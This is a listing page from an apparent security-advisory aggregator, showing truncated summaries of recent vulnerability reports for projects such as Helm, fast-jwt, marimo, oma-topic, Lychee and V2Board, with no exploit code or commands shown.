Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

Security Intel Hub 23479+

Curated security advisories, vulnerability analyses, and exploit write-ups — auto-cleaned and translated to English. Updated continuously.

Examples: RCE · SSRF · GHSA · log4j
CVE-2025-13926: Contemporary Controls BASC 20T Unauthenticated Access Vulnerability
www.cisa.gov · 2026-04-10

# Vulnerability Summary: Contemporary Controls BASC 20T ### Vulnerability Overview Successful exploitation of this vulnerability allows an attacker to enumerate functionalities associated with each co…

Read more
Helm Plugin Version Path Traversal Vulnerability Fix Analysis
github.com · 2026-04-10

### Vulnerability Key Information Summary **1. Vulnerability Overview** * **Vulnerability Name:** Helm Plugin Version Path Traversal (Plugin version path traversal) * **Vulnerability Type:** Insuffici…

Read more
fast-jwt ReDoS Vulnerability (CVE-2025-35941) and Fix Details
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** * **CVE ID:** CVE-2025-35941 / GHSA-cj9d-ghj4-fxwf * **Vulnerability Type:** ReDoS (Regular Expression Denial of Service) * **Description:** In the…

Read more
Helm Plugin Install Signature Verification Bypass Fix
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** In Helm's plugin installation functionality, when the signature verification option (`--verify`) is enabled, the system previously only printed a w…

Read more
fast-jwt CVE-2020-35040: Stateful Regex Non-deterministic Validation Bypass
github.com · 2026-04-10

### Vulnerability Summary **1. Vulnerability Overview** * **CVE ID**: CVE-2020-35040 * **Vulnerability Type**: Non-deterministic validation caused by stateful regular expressions (Stateful regexp caus…

Read more
fast-jwt ReDoS Vulnerability Analysis and POC
github.com · 2026-04-10

### Vulnerability Overview A Regular Expression Denial of Service (ReDoS) vulnerability exists in the `fast-jwt` library. When the `allowedAud` (or other `allowed*`) validation options are configured …

Read more
fast-jwt CVE-2026-35041 ReDoS Vulnerability and Fix Analysis
github.com · 2026-04-10

### Vulnerability Summary **1. Vulnerability Overview** * **CVE ID**: CVE-2026-35041 * **GHSA ID**: GHSA-cjw9-ghj4-fwxf * **Vulnerability Type**: ReDoS (Regular Expression Denial of Service) * **Descr…

Read more
Helm v4.1.4 Security Fixes: Path Traversal, Unsigned Plugin Bypass
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** The Helm v4.1.4 release notes list three primary security fixes: 1. **GHSAl-hr2v-4r36-88hr**: Helm Chart extraction output directory collapse vulne…

Read more
oma-topic CRLF Injection in Topic Manifests Leading to APT Source Poisoning
github.com · 2026-04-10

### Vulnerability Summary: oma-topic CRLF Injection Vulnerability **1. Vulnerability Overview** * **Vulnerability Name**: oma-topic: 'name' Field in Topic Manifests (topic.json) May Allow CRLF Injecti…

Read more
oma-topics Control Character Injection Leading to Malicious APT Source Injection
github.com · 2026-04-10

### Key Vulnerability Summary **Vulnerability Overview** In the `oma-topics` module, control characters (such as newlines) within the `name` field of the `topics.json` file are not filtered, allowing …

Read more
marimo /terminal/ws Unauthenticated RCE Vulnerability Fix
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** GitHub Pull Request #9098 addresses a security vulnerability present in the `./ws/terminal` endpoint. Previously, this endpoint lacked authenticati…

Read more
Helm Chart Provenance Verification and Integrity Protection Guide
helm.sh · 2026-04-10

This webpage screenshot primarily introduces **Helm's Provenance and Integrity Mechanisms**, rather than a specific security vulnerability advisory. It details how to use PGP/GnuPG and Keybase.io to e…

Read more
marimo Terminal WebSocket Authentication Bypass Fix
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** This is an **Authentication Bypass** vulnerability. In the `marimo` project's terminal (`terminal`) route, the authentication logic was either miss…

Read more
fast-jwt Stateful RegExp Logical DoS (CVE-2026-35040)
github.com · 2026-04-10

# Vulnerability Summary: Logical DoS Caused by Stateful RegExp in fast-jwt ## 1. Vulnerability Overview * **Vulnerability Name**: Addendum: Stateful RegExp (g or /y) causes non-deterministic allowed-c…

Read more
PE File Parser Heap Corruption Fix Analysis
github.com · 2026-04-10

### Vulnerability Overview This commit addresses a **Heap Corruption** vulnerability present in the `pe_page_hash_calc` function. The primary risk factors include: 1. **Null Pointer Dereference**: The…

Read more
Marimo CVE-2025-39587 Pre-Auth RCE via /terminal/ws WebSocket
github.com · 2026-04-10

### Key Vulnerability Summary **Vulnerability Overview** The `/terminal/ws` terminal WebSocket endpoint in Marimo contains a pre-authentication Remote Code Execution (RCE) vulnerability. This endpoint…

Read more
v2board AuthController Email Verification Logic Error Causing DoS
github.com · 2026-04-10

### Vulnerability Summary **Vulnerability Overview** In the `v2board` project, the `AuthController.php` file contains a critical logic flaw within the `register`, `login`, and `forget` methods. During…

Read more
Lychee v7.5.3 SQL Operator Precedence Vulnerability (CVE-2026-39957) Bypasses Authorization
github.com · 2026-04-10

### Vulnerability Overview A SQL operator precedence vulnerability exists in the `SharingController::listAll()` method (line 138) of the Lychee Gallery software. This flaw allows the `orWhereNotNull(u…

Read more
HashGraph JS Custom Logic Worker Sandbox Escape via Function() Execution
github.com · 2026-04-10

### Vulnerability Key Information Summary **1. Vulnerability Overview** The HashGraph JavaScript Custom Logic worker currently executes user-provided code using `Function()`. This causes user code to …

Read more
V2Board/Xboard Unauthorized Account Takeover via Magic Link Token Leakage
chocapikk.com · 2026-04-10

### Vulnerability Overview The Xboard and V2Board panels contain an unauthorized account takeover vulnerability caused by the "Magic Link Login" feature. When an administrator enables this feature, an…

Read more

All articles are auto-cleaned (markdown extraction + LLM noise removal) and translated to English by our offline pipeline. Source URL is always preserved at the bottom of each article.

Want a specific source covered? Email us — we add new feeds weekly.